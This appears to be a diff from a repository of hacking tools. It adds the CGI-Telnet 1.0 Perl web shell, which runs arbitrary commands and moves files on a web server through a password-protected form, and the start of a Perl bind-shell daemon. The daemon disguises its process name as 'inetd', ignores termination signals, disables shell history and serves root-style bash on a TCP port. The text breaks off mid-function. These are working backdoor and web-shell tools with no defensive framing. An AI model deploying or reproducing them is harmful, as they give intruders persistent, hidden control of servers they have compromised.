{
if($WinNT)
{
binmode(SENDFILE);
binmode(STDOUT);
}
$FileSize = (stat($SendFile))[7];
($Filename = $SendFile) =~ m!([^/^\\]*)$!;
print "Content-Type: application/x-unknown\n";
print "Content-Length: $FileSize\n";
print "Content-Disposition: attachment; filename=$1\n\n";
print while(<SENDFILE>);
close(SENDFILE);
}
else # failed to open file
{
&PrintPageHeader("f");
print "<code>Failed to download $SendFile: $!</code>";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}
#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
# if no file is specified, print the upload form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileUploadForm;
&PrintPageFooter;
return;
}
&PrintPageHeader("c");
# start the uploading process
print "<code>Uploading $TransferFile to $CurrentDir...<br>";
# get the fullly qualified pathname of the file to be created
chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
$TransferFile =~ m!([^/^\\]*)$!;
$TargetName .= $PathSep.$1;
$TargetFileSize = length($in{'filedata'});
# if the file exists and we are not supposed to overwrite it
if(-e $TargetName && $Options ne "overwrite")
{
print "Failed: Destination file already exists.<br>";
}
else # file is not present
{
if(open(UPLOADFILE, ">$TargetName"))
{
binmode(UPLOADFILE) if $WinNT;
print UPLOADFILE $in{'filedata'};
close(UPLOADFILE);
print "Transfered $TargetFileSize Bytes.<br>";
print "File Path: $TargetName<br>";
}
else
{
print "Failed: $!<br>";
}
}
print "</code>";
&PrintCommandLineInputForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
# if no file is specified, print the download form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileDownloadForm;
&PrintPageFooter;
return;
}
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}
#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;
$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};
$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default
# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
&PerformLogin;
}
elsif($Action eq "command") # user wants to run a command
{
&ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
&UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
&DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
&PerformLogout;
}

692
138shell/T/telnet.pl.txt Normal file
View File

@@ -0,0 +1,692 @@
#!/usr/bin/perl
#------------------------------------------------------------------------------
# Copyright and Licence
#------------------------------------------------------------------------------
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
#
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
#
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Installation
#------------------------------------------------------------------------------
# To install this script
#
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
# your server. For most servers, you may not need to modify this.
# 2. Change the password in the Configuration section below.
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
# Configuration Section below.
# 4. Upload the script to a directory on your server which has permissions to
# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
# the script in ASCII mode.
# 5. Change the permission (CHMOD) of the script to 755.
# 6. Open the script in your web browser. If you uploaded the script in
# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
# 7. Login using the password that you specified in Step 2.
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = "1236987navaro"; # Change this. You will need to enter this
# to login.
$WinNT = 0; # You need to change the value of this to 1 if
# you're running this script on a Windows NT
# machine. If you're running it on Unix, you
# can leave the value as it is.
$NTCmdSep = "&"; # This character is used to seperate 2 commands
# in a command line on Windows NT.
$UnixCmdSep = ";"; # This character is used to seperate 2 commands
# in a command line on Unix.
$CommandTimeoutDuration = 10; # Time in seconds after commands will be killed
# Don't set this to a very large value. This is
# useful for commands that may hang or that
# take very long to execute, like "find /".
# This is valid only on Unix servers. It is
# ignored on NT Servers.
$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
# browser as soon as it is output, otherwise
# it is buffered and send when the command
# completes. This is useful for commands like
# ping, so that you can see the output as it
# is being generated.
# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse
{
local (*in) = @_ if @_;
local ($i, $loc, $key, $val);
$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
if($ENV{'REQUEST_METHOD'} eq "GET")
{
$in = $ENV{'QUERY_STRING'};
}
elsif($ENV{'REQUEST_METHOD'} eq "POST")
{
binmode(STDIN) if $MultipartFormData & $WinNT;
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
}
# handle file upload data
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
{
$Boundary = '--'.$1; # please refer to RFC1867
@list = split(/$Boundary/, $in);
$HeaderBody = $list[1];
$HeaderBody =~ /\r\n\r\n|\n\n/;
$Header = $`;
$Body = $';
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
$in{'filedata'} = $Body;
$Header =~ /filename=\"(.+)\"/;
$in{'f'} = $1;
$in{'f'} =~ s/\"//g;
$in{'f'} =~ s/\s//g;
# parse trailer
for($i=2; $list[$i]; $i++)
{
$list[$i] =~ s/^.+name=$//;
$list[$i] =~ /\"(\w+)\"/;
$key = $1;
$val = $';
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} = $val;
}
}
else # standard post data (url encoded, not multipart)
{
@in = split(/&/, $in);
foreach $i (0 .. $#in)
{
$in[$i] =~ s/\+/ /g;
($key, $val) = split(/=/, $in[$i], 2);
$key =~ s/%(..)/pack("c", hex($1))/ge;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} .= "\0" if (defined($in{$key}));
$in{$key} .= $val;
}
}
}
#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
print "Content-type: text/html\n\n";
print <<END;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>CGI-Telnet Version 1.0</title>
$HtmlMetaHeader
</head>
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
<b><font color="#000080" size="2">#</font></b></td>
<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
<a href="$ScriptLocation?a=logout">Disconnect</a> |
<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
</font></td>
</tr>
</table>
<font color="#C0C0C0" size="3">
END
}
#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
$Message = q$<pre><font color="#669999"> _____ _____ _____ _____ _ _
/ __ \| __ \|_ _| |_ _| | | | |
| / \/| | \/ | | ______ | | ___ | | _ __ ___ | |_
| | | | __ | | |______| | | / _ \| || '_ \ / _ \| __|
| \__/\| |_\ \ _| |_ | | | __/| || | | || __/| |_
\____/ \____/ \___/ \_/ \___||_||_| |_| \___| \__| 1.0
</font><font color="#FF0000"> ______ </font><font color="#AE8300"><3E> 2001, Rohitab Batra</font><font color="#FF0000">
.-&quot; &quot;-.
/ \
| |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________&gt;</font><font color="#FF0000">
)_/ \ /
(@ `--------`
</font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
$;
#'
print <<END;
<code>
Trying $ServerName...<br>
Connected to $ServerName<br>
Escape character is ^]
<code>$Message
END
}
#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
print <<END;
<code>
<br>login: admin<br>
password:<br>
Login incorrect<br><br>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
login: admin<br>
password:<input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
print "</font></body></html>";
}
#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
foreach $cookie(@httpcookies)
{
($id, $val) = split(/=/, $cookie);
$Cookies{$id} = $val;
}
}
#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
print "<code>Connection closed by foreign host.<br><br></code>";
}
#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
&PrintPageHeader("p");
&PrintLogoutScreen;
&PrintLoginScreen;
&PrintLoginForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin
{
if($LoginPassword eq $Password) # password matched
{
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
&PrintPageHeader("c");
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # password didn't match
{
&PrintPageHeader("p");
&PrintLoginScreen;
if($LoginPassword ne "") # some password was entered
{
&PrintLoginFailedMessage;
}
&PrintLoginForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
<input type="submit" value="Enter">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}
#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
if(!$WinNT)
{
alarm(0);
print <<END;
</xmp>
<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
<code>
END
&PrintCommandLineInputForm;
&PrintPageFooter;
exit;
}
}
#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
{
# we change the directory internally. The output of the
# command is not displayed.
$OldDir = $CurrentDir;
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
chop($CurrentDir = `$Command`);
&PrintPageHeader("c");
$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
print "<code>$Prompt $RunCommand</code>";
}
else # some other command, display the output
{
&PrintPageHeader("c");
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print "<code>$Prompt $RunCommand</code><xmp>";
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
if(!$WinNT)
{
$SIG{'ALRM'} = \&CommandTimeout;
alarm($CommandTimeoutDuration);
}
if($ShowDynamicOutput) # show output as it is generated
{
$|=1;
$Command .= " |";
open(CommandOutput, $Command);
while(<CommandOutput>)
{
$_ =~ s/(\n|\r\n)$//;
print "$_\n";
}
$|=0;
}
else # show output after command completes
{
print `$Command`;
}
if(!$WinNT)
{
alarm(0);
}
print "</xmp>";
}
&PrintCommandLineInputForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
local($FileUrl) = @_;
if(-e $FileUrl) # if the file exists
{
# encode the file link so we can send it to the browser
$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
&PrintPageHeader("c");
print <<END;
<code>
Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
</code>
END
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # file doesn't exist
{
&PrintPageHeader("f");
print "<code>Failed to download $FileUrl: $!</code>";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
local($SendFile) = @_;
if(open(SENDFILE, $SendFile)) # file opened for reading
{
if($WinNT)
{
binmode(SENDFILE);
binmode(STDOUT);
}
$FileSize = (stat($SendFile))[7];
($Filename = $SendFile) =~ m!([^/^\\]*)$!;
print "Content-Type: application/x-unknown\n";
print "Content-Length: $FileSize\n";
print "Content-Disposition: attachment; filename=$1\n\n";
print while(<SENDFILE>);
close(SENDFILE);
}
else # failed to open file
{
&PrintPageHeader("f");
print "<code>Failed to download $SendFile: $!</code>";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}
#------------------------------------------------------------------------------
# This function is called when the user downloads a file. It displays a message
# to the user and provides a link through which the file can be downloaded.
# This function is also called when the user clicks on that link. In this case,
# the file is read and sent to the browser.
#------------------------------------------------------------------------------
sub BeginDownload
{
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}
#------------------------------------------------------------------------------
# This function is called when the user wants to upload a file. If the
# file is not specified, it displays a form allowing the user to specify a
# file, otherwise it starts the upload process.
#------------------------------------------------------------------------------
sub UploadFile
{
# if no file is specified, print the upload form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileUploadForm;
&PrintPageFooter;
return;
}
&PrintPageHeader("c");
# start the uploading process
print "<code>Uploading $TransferFile to $CurrentDir...<br>";
# get the fullly qualified pathname of the file to be created
chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
$TransferFile =~ m!([^/^\\]*)$!;
$TargetName .= $PathSep.$1;
$TargetFileSize = length($in{'filedata'});
# if the file exists and we are not supposed to overwrite it
if(-e $TargetName && $Options ne "overwrite")
{
print "Failed: Destination file already exists.<br>";
}
else # file is not present
{
if(open(UPLOADFILE, ">$TargetName"))
{
binmode(UPLOADFILE) if $WinNT;
print UPLOADFILE $in{'filedata'};
close(UPLOADFILE);
print "Transfered $TargetFileSize Bytes.<br>";
print "File Path: $TargetName<br>";
}
else
{
print "Failed: $!<br>";
}
}
print "</code>";
&PrintCommandLineInputForm;
&PrintPageFooter;
}
#------------------------------------------------------------------------------
# This function is called when the user wants to download a file. If the
# filename is not specified, it displays a form allowing the user to specify a
# file, otherwise it displays a message to the user and provides a link
# through which the file can be downloaded.
#------------------------------------------------------------------------------
sub DownloadFile
{
# if no file is specified, print the download form again
if($TransferFile eq "")
{
&PrintPageHeader("f");
&PrintFileDownloadForm;
&PrintPageFooter;
return;
}
# get fully qualified path of the file to be downloaded
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
{
$TargetFile = $TransferFile;
}
else # path is relative
{
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
$TargetFile .= $PathSep.$TransferFile;
}
if($Options eq "go") # we have to send the file
{
&SendFileToBrowser($TargetFile);
}
else # we have to send only the link page
{
&PrintDownloadLinkPage($TargetFile);
}
}
#------------------------------------------------------------------------------
# Main Program - Execution Starts Here
#------------------------------------------------------------------------------
&ReadParse;
&GetCookies;
$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$LoginPassword = $in{'p'};
$RunCommand = $in{'c'};
$TransferFile = $in{'f'};
$Options = $in{'o'};
$Action = $in{'a'};
$Action = "login" if($Action eq ""); # no action specified, use default
# get the directory in which the commands will be executed
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
if($Action eq "login" || !$LoggedIn) # user needs/has to login
{
&PerformLogin;
}
elsif($Action eq "command") # user wants to run a command
{
&ExecuteCommand;
}
elsif($Action eq "upload") # user wants to upload a file
{
&UploadFile;
}
elsif($Action eq "download") # user wants to download a file
{
&DownloadFile;
}
elsif($Action eq "logout") # user wants to logout
{
&PerformLogout;
}

462
138shell/T/telnetd.pl.txt Normal file
View File

@@ -0,0 +1,462 @@
#!/usr/bin/perl
# Telnet-like Standard Daemon 0.7
#
# 0ldW0lf - oldwolf@atrixteam.net
# - old-wolf@zipmai.com
# - www.atrix.cjb.net
# - www.atrixteam.net
#
# For those guys that still like to open ports
# and use non-rooted boxes
#
# This has been developed to join in the TocToc
# project code, now it's done and I'm distributing
# this separated
#
# This one i made without IO::Pty so it uses
# only standard modules... enjoy it
#
# tested on linux boxes.. probably will work fine on others
# any problem... #atrix@irc.brasnet.org
#
##########################################################
# ******************* CONFIGURATION ******************** #
##########################################################
my $PORT = $ARGV[0] || 3847; # default port is 3847
my $PASS = ''; # encripted password
my $SHELL = "/bin/bash"; # shell to be executed
my $HOME = "/tmp"; # your HOME
my $PROC = "inetd"; # name of the process
my $PASS_PROMPT = "Password: "; # password prompt
my $WRONG_PASS = "Wrong password!"; # "wrong password" message
my @STTY = ('sane', 'dec'); # stty arguments
##########################################################
# feel free to change the ENV
#### ENVironment ####
$ENV{HOME} = $HOME;
#$ENV{PS1} = '[\u@\h \W]: '; # the way i like :)
# colorful PS1 is also funny :)
$ENV{PS1} = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
$ENV{MAIL} = '/var/mail/root';
$ENV{PATH} = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin';
$ENV{HISTFILE} = '/dev/null';
$ENV{USER} = 'root';
$ENV{LOGNAME} = 'root';
$ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0';
$ENV{LS_COLORS} = 'no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.bz2=01;31:*.rpm=01;31:*.deb=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.mpg=01;37:*.avi=01;37:*.mov=01;37:';
$ENV{SHELL} = $SHELL;
$ENV{TERM} = 'xterm';
#####################
$0=$PROC."\0";
use IO::Socket;
use IO::Select;
use POSIX;
use strict;
# i wouldn't change that
# if i were you
###### SIGnals ######
$SIG{HUP} = 'IGNORE';
$SIG{PS} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = sub { wait; };
#####################
# ioctl stuff
my %IOCTLDEF;
$IOCTLDEF{TIOCSWINSZ} = 0x5414;
$IOCTLDEF{TIOCNOTTY} = 0x5422;
$IOCTLDEF{TIOCSCTTY} = 0x540E;
safeload('sys/ttycom.ph', 1); # BSD
safeload('sys/ioctl.ph', 1);
safeload('asm/ioctls.ph', 1);
foreach my $IOCTL (keys(%IOCTLDEF)) {
next if (defined(&{$IOCTL}));
if (open(IOD, "< /usr/include/asm/ioctls.h")) { # linux
while(<IOD>) {
if (/^\#define\s+$IOCTL\s+(.*?)\n$/) {
eval "sub $IOCTL () {$1;}";
last;
}
}
close(IOD);
}
# i realy dunno if i can do that.. but.. here it goes
eval "sub $IOCTL () { $IOCTLDEF{$IOCTL};}" unless (defined(&{$IOCTL}));
}
# starting...
$PORT = $ARGV[0] if ($ARGV[0]);
chdir('/');
no strict 'refs';
my $bindfd = *{'bind_sock'};
*{$bindfd}= IO::Socket::INET->new(Listen => 1, LocalPort => $PORT, Proto => "tcp") || die "could not listen on port $PORT: $!";
my $bind = \*{$bindfd};
my $pid = fork();
die "ERROR: I could not fork() the process." unless defined($pid);
exit if $pid;
my %CLIENT;
my $sel_serv = IO::Select->new($bind);
my $sel_shell = IO::Select->new();
# main loop...
while ( 1 ) {
select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);
read_clients();
read_shells();
}
sub read_clients {
map { read_client($_) } ($sel_serv->can_read(0.01));
}
sub read_client {
my $fh = shift;
if ($fh eq $bind) {
my $newcon = $bind->accept;
$sel_serv->add($newcon);
$CLIENT{$newcon}->{senha} = 0;
$CLIENT{$newcon}->{sock} = $newcon;
$fh->autoflush(1);
do_client($newcon, '3', '5', '1');
sleep(1);
write_client($newcon, $PASS_PROMPT) if ($PASS_PROMPT);
} else {
my $msg;
my $nread = sysread($fh, $msg, 1024);
if ($nread == 0) {
close_client($fh);
} else {
telnet_parse($fh, $msg);
}
}
}
sub read_shells {
map { read_shell($_) } ($sel_shell->can_read(0.01));
}
sub telnet_parse {
my ($cli, $msg) = @_;
my $char = (split('', $msg))[0];
if (ord($char) == 255) {
chr_parse($cli, $msg);
} else {
if ($CLIENT{$cli}->{senha} == 0) {
$CLIENT{$cli}->{buf} .= $msg;
return() unless ($msg =~ /\r|\n/);
my $pass = $CLIENT{$cli}->{buf};
$CLIENT{$cli}->{buf} = '';
$pass =~ s/\n//g;
$pass =~ s/\0//g;
$pass =~ s/\r//g;
if (crypt($pass, $PASS) ne $PASS) {
finish_client($cli, "\r\n\r".$WRONG_PASS."\r\n\r");
} else {
$CLIENT{$cli}->{senha} = 1;
write_client($cli, chr(255).chr(253).chr(31));
write_client($cli, "\r\n\r\r\n\r");
new_shell($cli);
}
return();
}
$msg =~ s/\r\n\0\0//g;
$msg =~ s/\0//g;
$msg =~ s/\r\n/\n/g;
write_shell($cli, $msg);
}
}
sub read_shell {
my $shell = shift;
my $cli;
map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
my $msg;
my $nread = sysread($shell, $msg, 1024);
if ($nread == 0) {
finish_client($cli, "Terminal closed.\r\n\r");
} else {
write_client($cli, $msg);
}
}
sub to_chr {
my $chrs = '';
map { $chrs .= chr($_) } (split(/ +/, shift));
return($chrs);
}
sub do_client {
my ($client, @codes) = @_;
map { write_client($client, chr(255).chr(251).chr($_)) } @codes;
}
sub chr_parse {
my ($client, $chrs) = @_;
my $ords = '';
map { $ords .= ord($_).' ' } (split(//, $chrs));
my $msg = '';
if ($ords =~ /255 250 31 (\d+) (\d+) (\d+) (\d+)/) {
my $winsize = pack('C4', $4, $3, $2, $1);
ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# || die "erro: $!";
}
foreach my $code (split("255 ", $ords)) {
if ($code =~ /(\d+) (.*)$/) {
my $codes = $2;
if ($1 == 251) {
# do whatever you want dude ehehe
$msg .= chr(255).chr(253);
map { $msg .= chr($_) } (split(/ +/, $codes));
}
}
}
write_client($client, $msg) if ($msg);
return(1);
}
sub new_shell {
my $cli = shift;
POSIX::setpgid(0, 0);
my ($tty, $pty);
